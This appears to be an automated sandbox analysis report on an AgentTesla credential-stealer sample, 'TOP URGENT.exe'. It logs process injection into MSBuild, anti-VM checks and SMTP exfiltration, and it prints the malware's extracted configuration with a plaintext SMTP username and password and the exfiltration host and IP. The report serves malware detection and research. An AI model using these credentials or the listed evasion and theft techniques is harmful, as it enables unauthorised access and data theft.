
Windows Analysis Report TOP URGENT.exe

Overview

General Information

Sample Name: TOP URGENT.exe
Analysis ID: 483922
MD5: 3af20ee616d2d9c806d27a3c245d4d7b
SHA1: f4448544d0fd560be3a8c1e6ff46670251785267
SHA256: c810e257ac876cb505d076efee941037f5f9fd11464a4af8515d0fbac61509b1
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: MSBuild connects to smtp port
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large strings
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • TOP URGENT.exe (PID: 6352 cmdline: 'C:\Users\user\Desktop\TOP URGENT.exe' MD5: 3AF20EE616D2D9C806D27A3C245D4D7B)
    • MSBuild.exe (PID: 6592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "ppc@almuntakhaba.com", "Password": "amite123", "Host": "smtp.almuntakhaba.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.TOP URGENT.exe.3e4d7b0.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.TOP URGENT.exe.3e4d7b0.5.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.TOP URGENT.exe.3f5dfd0.4.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                      Sigma Overview

                      Networking:

                      Sigma detected: MSBuild connects to smtp port
                      Source: Network Connection | Author: Joe Security | Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6592, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49820

                      System Summary:

                      Sigma detected: Possible Applocker Bypass
                      Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\TOP URGENT.exe' , ParentImage: C:\Users\user\Desktop\TOP URGENT.exe, ParentProcessId: 6352, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 6592

                      Jbx Signature Overview

                      AV Detection:

                      Found malware configuration
                      Source: 4.2.MSBuild.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "ppc@almuntakhaba.com", "Password": "amite123", "Host": "smtp.almuntakhaba.com"}
                      Multi AV Scanner detection for submitted file
                      Source: TOP URGENT.exe | ReversingLabs: Detection: 15%
                      Source: 4.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
                      Source: TOP URGENT.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknown | HTTPS traffic detected: 20.190.160.131:443 -> 192.168.2.3:49821 version: TLS 1.2
                      Source: TOP URGENT.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49820 -> 208.91.199.225:587
                      Source: Joe Sandbox View | JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
                      Source: Joe Sandbox View | IP Address: 208.91.199.225
                      Source: global traffic | TCP traffic: 192.168.2.3:49820 -> 208.91.199.225:587
                      Source: unknown | DNS traffic detected: queries for: smtp.almuntakhaba.com
                      Source: unknown | HTTPS traffic detected: 20.190.160.131:443 -> 192.168.2.3:49821 version: TLS 1.2
                      Source: TOP URGENT.exe, 00000000.00000002.244355309.00000000011B0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands:

                      Modifies the hosts file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts

                      System Summary:

                      .NET source code contains very large strings
                      Source: TOP URGENT.exe, Form1.cs | Long String: Length: 38272
                      Source: 0.2.TOP URGENT.exe.9f0000.0.unpack, Form1.cs | Long String: Length: 38272
                      Source: 0.0.TOP URGENT.exe.9f0000.0.unpack, Form1.cs | Long String: Length: 38272
                      Source: TOP URGENT.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: TOP URGENT.exeBinary or memory string: OriginalFilename vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.244355309.00000000011B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000000.222779716.00000000009F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRuntimeFeatu.exeh$ vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.249062547.0000000008E50000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.244962828.0000000002D97000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs TOP URGENT.exe
                      Source: TOP URGENT.exe, 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNuOvAFWSWQdMrKTXvyKfCQZfruIZXIbbF.exe4 vs TOP URGENT.exe
                      Source: TOP URGENT.exeBinary or memory string: OriginalFilenameRuntimeFeatu.exeh$ vs TOP URGENT.exe
                      Source: TOP URGENT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: TOP URGENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: TOP URGENT.exeReversingLabs: Detection: 15%
                      Source: C:\Users\user\Desktop\TOP URGENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\TOP URGENT.exe 'C:\Users\user\Desktop\TOP URGENT.exe'
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\TOP URGENT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TOP URGENT.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.spre.troj.adwa.spyw.evad.winEXE@3/2@2/1
                      Source: C:\Users\user\Desktop\TOP URGENT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                      Source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb+
                      Source: MSBuild.exe, 00000004.00000002.505611329.0000000005CD7000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsmtpalmuntakhaba.com))4
                      Source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
                      Source: TOP URGENT.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.TOP URGENT.exe.9f0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.0.TOP URGENT.exe.9f0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: TOP URGENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: TOP URGENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: MSBuild.exe, 00000004.00000002.505630995.0000000005CE0000.00000004.00000001.sdmp
                      Source: Binary string: l0C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb+ source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: MSBuild.PDB source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 00000004.00000002.505630995.0000000005CE0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsmtpalmuntakhaba.com))4 source: MSBuild.exe, 00000004.00000002.505611329.0000000005CD7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000004.00000002.505657979.0000000005CE9000.00000004.00000001.sdmp
                      Source: Binary string: lC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbr source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp
                      Source: Binary string: .pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000004.00000002.495388966.0000000000AF8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MSBuild.exe, 00000004.00000002.505554531.0000000005C80000.00000004.00000001.sdmp

                      Data Obfuscation:

                      .NET source code contains potential unpacker
                      Source: TOP URGENT.exe, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.TOP URGENT.exe.9f0000.0.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.TOP URGENT.exe.9f0000.0.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\TOP URGENT.exeCode function: 0_2_009F297F push 20000001h; retf 0_2_009F2992
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1B517 push edi; retn 0000h4_2_00E1B519
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1D51B push ebp; iretd 4_2_00E1D559
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1DA85 push edi; ret 4_2_00E1DA86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00E1D380 pushfd ; retf 4_2_00E1D38D
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.54096955911
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match | File source: 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: TOP URGENT.exe PID: 6352, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\TOP URGENT.exe TID: 6356Thread sleep time: -40352s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exe TID: 6396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7132Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7148Thread sleep count: 1286 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7148Thread sleep count: 8566 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1286Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8566Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeThread delayed: delay time: 40352Jump to behavior
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: TOP URGENT.exe, 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: MSBuild.exe, 00000004.00000002.505611329.0000000005CD7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00B55598 LdrInitializeThunk,4_2_00B55598
                      Source: C:\Users\user\Desktop\TOP URGENT.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\TOP URGENT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                      Source: C:\Users\user\Desktop\TOP URGENT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                      Source: C:\Users\user\Desktop\TOP URGENT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000
                      Source: C:\Users\user\Desktop\TOP URGENT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
                      Source: C:\Users\user\Desktop\TOP URGENT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8CB008
                      Modifies the hosts file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\TOP URGENT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\TOP URGENT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: MSBuild.exe, 00000004.00000002.500534051.0000000001370000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Users\user\Desktop\TOP URGENT.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
